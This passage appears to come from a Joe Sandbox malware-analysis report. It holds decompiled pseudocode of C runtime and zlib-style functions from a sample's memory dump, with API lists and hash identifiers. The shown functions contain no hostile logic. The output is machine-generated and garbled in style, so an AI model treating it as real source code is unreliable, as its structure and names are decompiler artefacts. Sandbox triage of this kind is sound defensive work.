                                                                        								goto L28;
                                                                        							}
                                                                        							_t25 = _t182 + 8; // 0x8
                                                                        							_t152 = _t182 + _t25;
                                                                        							if(_t182 + _t25 > 0x400) {
                                                                        								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                        								__eflags = _t153;
                                                                        								if(_t153 == 0) {
                                                                        									L27:
                                                                        									_v16 = _t153;
                                                                        									goto L29;
                                                                        								}
                                                                        								 *_t153 = 0xdddd;
                                                                        								L26:
                                                                        								_t153 =  &(_t153[4]);
                                                                        								goto L27;
                                                                        							}
                                                                        							E0040CFB0(_t152);
                                                                        							_t153 = _t189;
                                                                        							if(_t153 == 0) {
                                                                        								goto L27;
                                                                        							}
                                                                        							 *_t153 = 0xcccc;
                                                                        							goto L26;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t178 = _a16;
                                                                        				_t157 = _a12;
                                                                        				while(1) {
                                                                        					_t178 = _t178 - 1;
                                                                        					if( *_t157 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t157 =  &(_t157[1]);
                                                                        					if(_t178 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					_t178 = _t178 | 0xffffffff;
                                                                        					break;
                                                                        				}
                                                                        				_t160 = _a16 - _t178 - 1;
                                                                        				if(_t160 < _a16) {
                                                                        					_t160 = _t160 + 1;
                                                                        				}
                                                                        				_a16 = _t160;
                                                                        				goto L13;
                                                                        			}

                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,008718D8), ref: 004170C5
                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                        • __freea.LIBCMT ref: 004172A4
                                                                        • __freea.LIBCMT ref: 004172AD
                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                        • _malloc.LIBCMT ref: 00417362
                                                                        • _memset.LIBCMT ref: 00417384
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                        • __freea.LIBCMT ref: 004173CF
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                        • String ID:
                                                                        • API String ID: 3809854901-0
                                                                        • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                        • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E004057B0(intOrPtr* __eax) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t57;
                                                                        				char* _t60;
                                                                        				char _t62;
                                                                        				intOrPtr _t63;
                                                                        				char _t64;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr* _t83;
                                                                        				void* _t86;
                                                                        				char* _t88;
                                                                        				char* _t89;
                                                                        				intOrPtr* _t91;
                                                                        				intOrPtr* _t93;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				void* _t100;
                                                                        				void* _t101;
                                                                        				void* _t102;
                                                                        				void* _t103;
                                                                        				void* _t104;
                                                                        
                                                                        				_t98 = _t97 | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                        				_t91 = __eax;
                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                        					_t101 = _t100 + 4;
                                                                        					if(_t93 == 0) {
                                                                        						L31:
                                                                        						return 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                        						 *_t93 = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                        						_t102 = _t101 + 0xc;
                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                        						_t87 = _t57 + 1;
                                                                        						do {
                                                                        							_t82 =  *_t57;
                                                                        							_t57 = _t57 + 1;
                                                                        						} while (_t82 != 0);
                                                                        						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                        						_t103 = _t102 + 4;
                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                        						if(_t60 == 0) {
                                                                        							L30:
                                                                        							E00405160(0, _t87, _t93);
                                                                        							goto L31;
                                                                        						} else {
                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                        							_t88 = _t60;
                                                                        							goto L7;
                                                                        							L9:
                                                                        							if( *_t91 == 0x72) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                        							}
                                                                        							_t63 =  *_t91;
                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                        							}
                                                                        							_t64 =  *_t91;
                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                        								__eflags = _t64 - 0x66;
                                                                        								if(_t64 != 0x66) {
                                                                        									__eflags = _t64 - 0x68;
                                                                        									if(_t64 != 0x68) {
                                                                        										__eflags = _t64 - 0x52;
                                                                        										if(_t64 != 0x52) {
                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                        											 *_t89 = _t64;
                                                                        											_t87 = _t89 + 1;
                                                                        											__eflags = _t87;
                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                        										}
                                                                        									} else {
                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                        									}
                                                                        								} else {
                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                        								}
                                                                        							} else {
                                                                        								_t98 = _t64 - 0x30;
                                                                        							}
                                                                        							_t91 = _t91 + 1;
                                                                        							if(_t64 == 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_t87 = _t103 + 0x68;
                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                        								goto L9;
                                                                        							}
                                                                        							L26:
                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                        							if(_t65 == 0) {
                                                                        								goto L30;
                                                                        							} else {
                                                                        								if(_t65 != 0x77) {
                                                                        									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                        									 *_t93 = _t66;
                                                                        									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                        									_t104 = _t103 + 0x14;
                                                                        									__eflags = _t67;
                                                                        									if(_t67 != 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                        										if(__eflags == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											goto L34;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									_push(0x38);
                                                                        									_push("1.2.3");
                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                        									_push(8);
                                                                        									_push(0xfffffff1);
                                                                        									_push(8);
                                                                        									_push(_t98);
                                                                        									_push(_t93);
                                                                        									_t91 = E00404CE0();
                                                                        									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									_t104 = _t103 + 0x24;
                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										L34:
                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                        										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        										__eflags = _t69;
                                                                        										_push(_t104 + 0x18);
                                                                        										if(__eflags >= 0) {
                                                                        											_push(_t69);
                                                                        											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                        										} else {
                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                        											_t70 = E0040CB9D();
                                                                        										}
                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                        										__eflags = _t70;
                                                                        										if(_t70 == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                        												E00405000(_t93, 0);
                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                        												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                        												__eflags = _t74;
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                        												return _t93;
                                                                        											} else {
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                        												return _t93;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L42;
                                                                        							L7:
                                                                        							_t62 =  *_t83;
                                                                        							 *_t88 = _t62;
                                                                        							_t83 = _t83 + 1;
                                                                        							_t88 = _t88 + 1;
                                                                        							if(_t62 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                        							}
                                                                        							goto L9;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L42:
                                                                        			}

































                                                                        0x00405916
                                                                        0x00000000
                                                                        0x00405955
                                                                        0x00405955
                                                                        0x00405955
                                                                        0x00405961
                                                                        0x00405963
                                                                        0x00405967
                                                                        0x0040596d
                                                                        0x0040596e
                                                                        0x0040597c
                                                                        0x0040597d
                                                                        0x00405970
                                                                        0x00405970
                                                                        0x00405974
                                                                        0x00405975
                                                                        0x00405975
                                                                        0x00405985
                                                                        0x00405988
                                                                        0x0040598a
                                                                        0x00000000
                                                                        0x0040598c
                                                                        0x0040598c
                                                                        0x00405990
                                                                        0x004059a5
                                                                        0x004059ad
                                                                        0x004059b6
                                                                        0x004059b6
                                                                        0x004059b9
                                                                        0x004059c5
                                                                        0x00405992
                                                                        0x00405992
                                                                        0x004059a2
                                                                        0x004059a2
                                                                        0x00405990
                                                                        0x0040598a
                                                                        0x00405916
                                                                        0x004058e4
                                                                        0x00000000
                                                                        0x00405860
                                                                        0x00405860
                                                                        0x00405862
                                                                        0x00405864
                                                                        0x00405865
                                                                        0x00405868
                                                                        0x00000000
                                                                        0x0040586a
                                                                        0x0040586a
                                                                        0x0040586d
                                                                        0x00000000
                                                                        0x00405868
                                                                        0x0040584f
                                                                        0x004057ea
                                                                        0x00000000

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • _malloc.LIBCMT ref: 00405842
                                                                        • _malloc.LIBCMT ref: 00405906
                                                                        • _malloc.LIBCMT ref: 00405930
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _malloc$AllocateHeap
                                                                        • String ID: 1.2.3
                                                                        • API String ID: 680241177-2310465506
                                                                        • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                        • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                        				signed int _v8;
                                                                        				char* _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t90;
                                                                        				intOrPtr* _t92;
                                                                        				signed int _t94;
                                                                        				char _t97;
                                                                        				signed int _t105;
                                                                        				void* _t106;
                                                                        				signed int _t107;
                                                                        				signed int _t110;
                                                                        				signed int _t113;
                                                                        				intOrPtr* _t114;
                                                                        				signed int _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        				char* _t121;
                                                                        				signed int _t125;
                                                                        				signed int _t131;
                                                                        				signed int _t133;
                                                                        				void* _t134;
                                                                        
                                                                        				_t125 = __edx;
                                                                        				_t121 = _a4;
                                                                        				_t119 = _a8;
                                                                        				_t131 = 0;
                                                                        				_v12 = _t121;
                                                                        				_v8 = _t119;
                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t138 = _t121;
                                                                        					if(_t121 != 0) {
                                                                        						_t133 = _a20;
                                                                        						__eflags = _t133;
                                                                        						if(_t133 == 0) {
                                                                        							L9:
                                                                        							__eflags = _t119 - 0xffffffff;
                                                                        							if(_t119 != 0xffffffff) {
                                                                        								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                        								_t134 = _t134 + 0xc;
                                                                        							}
                                                                        							__eflags = _t133 - _t131;
                                                                        							if(__eflags == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t94 = _t90 | 0xffffffff;
                                                                        								_t125 = _t94 % _a12;
                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                        								if(__eflags > 0) {
                                                                        									goto L3;
                                                                        								}
                                                                        								L13:
                                                                        								_t131 = _a12 * _a16;
                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        								_v20 = _t131;
                                                                        								_t120 = _t131;
                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        									_v16 = 0x1000;
                                                                        								} else {
                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        								}
                                                                        								__eflags = _t131;
                                                                        								if(_t131 == 0) {
                                                                        									L40:
                                                                        									return _a16;
                                                                        								} else {
                                                                        									do {
                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        											L24:
                                                                        											__eflags = _t120 - _v16;
                                                                        											if(_t120 < _v16) {
                                                                        												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                        												__eflags = _t97 - 0xffffffff;
                                                                        												if(_t97 == 0xffffffff) {
                                                                        													L48:
                                                                        													return (_t131 - _t120) / _a12;
                                                                        												}
                                                                        												__eflags = _v8;
                                                                        												if(_v8 == 0) {
                                                                        													L44:
                                                                        													__eflags = _a8 - 0xffffffff;
                                                                        													if(__eflags != 0) {
                                                                        														E0040BA30(_t131, _a4, 0, _a8);
                                                                        														_t134 = _t134 + 0xc;
                                                                        													}
                                                                        													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													L4:
                                                                        													E0040E744(_t125, _t131, _t133);
                                                                        													goto L5;
                                                                        												}
                                                                        												_t123 = _v12;
                                                                        												_v12 = _v12 + 1;
                                                                        												 *_v12 = _t97;
                                                                        												_t120 = _t120 - 1;
                                                                        												_t70 =  &_v8;
                                                                        												 *_t70 = _v8 - 1;
                                                                        												__eflags =  *_t70;
                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        												goto L39;
                                                                        											}
                                                                        											__eflags = _v16;
                                                                        											if(_v16 == 0) {
                                                                        												_t105 = 0x7fffffff;
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t105 = _t120;
                                                                        												}
                                                                        											} else {
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t55 = _t120 % _v16;
                                                                        													__eflags = _t55;
                                                                        													_t125 = _t55;
                                                                        													_t110 = _t120;
                                                                        												} else {
                                                                        													_t125 = 0x7fffffff % _v16;
                                                                        													_t110 = 0x7fffffff;
                                                                        												}
                                                                        												_t105 = _t110 - _t125;
                                                                        											}
                                                                        											__eflags = _t105 - _v8;
                                                                        											if(_t105 > _v8) {
                                                                        												goto L44;
                                                                        											} else {
                                                                        												_push(_t105);
                                                                        												_push(_v12);
                                                                        												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                        												_pop(_t123);
                                                                        												_push(_t106);
                                                                        												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                        												_t134 = _t134 + 0xc;
                                                                        												__eflags = _t107;
                                                                        												if(_t107 == 0) {
                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                        													goto L48;
                                                                        												}
                                                                        												__eflags = _t107 - 0xffffffff;
                                                                        												if(_t107 == 0xffffffff) {
                                                                        													L47:
                                                                        													_t80 = _t133 + 0xc;
                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                        													__eflags =  *_t80;
                                                                        													goto L48;
                                                                        												}
                                                                        												_v12 = _v12 + _t107;
                                                                        												_t120 = _t120 - _t107;
                                                                        												_v8 = _v8 - _t107;
                                                                        												goto L39;
                                                                        											}
                                                                        										}
                                                                        										_t113 =  *(_t133 + 4);
                                                                        										__eflags = _t113;
                                                                        										if(__eflags == 0) {
                                                                        											goto L24;
                                                                        										}
                                                                        										if(__eflags < 0) {
                                                                        											goto L47;
                                                                        										}
                                                                        										_t131 = _t120;
                                                                        										__eflags = _t120 - _t113;
                                                                        										if(_t120 >= _t113) {
                                                                        											_t131 = _t113;
                                                                        										}
                                                                        										__eflags = _t131 - _v8;
                                                                        										if(_t131 > _v8) {
                                                                        											_t133 = 0;
                                                                        											__eflags = _a8 - 0xffffffff;
                                                                        											if(__eflags != 0) {
                                                                        												E0040BA30(_t131, _a4, 0, _a8);
                                                                        												_t134 = _t134 + 0xc;
                                                                        											}
                                                                        											_t114 = E0040BFC1(__eflags);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											 *_t114 = 0x22;
                                                                        											_push(_t133);
                                                                        											goto L4;
                                                                        										} else {
                                                                        											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                        											 *_t133 =  *_t133 + _t131;
                                                                        											_v12 = _v12 + _t131;
                                                                        											_t120 = _t120 - _t131;
                                                                        											_t134 = _t134 + 0x10;
                                                                        											_v8 = _v8 - _t131;
                                                                        											_t131 = _v20;
                                                                        										}
                                                                        										L39:
                                                                        										__eflags = _t120;
                                                                        									} while (_t120 != 0);
                                                                        									goto L40;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t118 = _t90 | 0xffffffff;
                                                                        						_t90 = _t118 / _a12;
                                                                        						_t125 = _t118 % _a12;
                                                                        						__eflags = _a16 - _t90;
                                                                        						if(_a16 <= _t90) {
                                                                        							goto L13;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					L3:
                                                                        					_t92 = E0040BFC1(_t138);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					 *_t92 = 0x16;
                                                                        					_push(_t131);
                                                                        					goto L4;
                                                                        				}
                                                                        			}






























                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3886058894-0
                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t13;
                                                                        				intOrPtr _t28;
                                                                        				void* _t29;
                                                                        				void* _t30;
                                                                        
                                                                        				_t30 = __eflags;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x4214d0);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                        				_t13 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                        					L6:
                                                                        					E0040D6E0(_t22, 0xc);
                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                        					_t26 =  *0x422f18; // 0x422e40
                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                        					E004147A2();
                                                                        				} else {
                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                        					}
                                                                        				}
                                                                        				if(_t28 == 0) {
                                                                        					E0040E79A(_t25, _t26, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t28);
                                                                        			}








                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00414744
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                        • __lock.LIBCMT ref: 00414779
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                        • String ID: @.B
                                                                        • API String ID: 3521780317-470711618
                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				intOrPtr _t19;
                                                                        				void* _t21;
                                                                        				signed int _t22;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t50;
                                                                        
                                                                        				_t37 = __edx;
                                                                        				_push(8);
                                                                        				_push(0x421140);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t39 = _a4;
                                                                        				_t50 = _t39;
                                                                        				_t51 = _t50 != 0;
                                                                        				if(_t50 != 0) {
                                                                        					E0040FB29(_t39);
